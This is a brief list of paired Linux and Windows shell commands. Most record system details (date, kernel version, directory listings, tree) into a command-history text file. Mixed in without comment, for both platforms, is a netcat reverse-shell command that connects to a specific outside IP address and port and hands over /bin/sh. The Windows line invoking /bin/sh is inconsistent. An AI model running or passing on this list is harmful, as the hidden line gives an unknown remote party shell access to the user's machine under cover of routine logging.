`Linux : $ / Windows : #` 

$echo >> /tmp/cmd_history.txt
#echo. >> c:\cmd_history.txt

$date >> /tmp/cmd_history.txt
#date /t >> c:\cmd_history.txt
#time /t >> c:\cmd_history.txt

$uname -r >> /tmp/cmd_history.txt
#ver >> c:\cmd_history.txt

$pwd >> /tmp/cmd_history.txt
#cd >> c:\cmd_history.txt

$ls -al >> /tmp/cmd_history.txt
#dir >> c:\cmd_history.txt

$tree >> /tmp/cmd_history.txt
#tree >> c:\cmd_history.txt

$mkdir /tmp/test >> /tmp/cmd_history.txt
#mkdir c:\test2 >> c:\cmd_history.txt

$nc 43.200.152.72 59210 -e /bin/sh
#nc 43.200.152.72 59210 -e /bin/sh

$echo >> /tmp/cmd_history.txt
#echo. >> c:\cmd_history.txt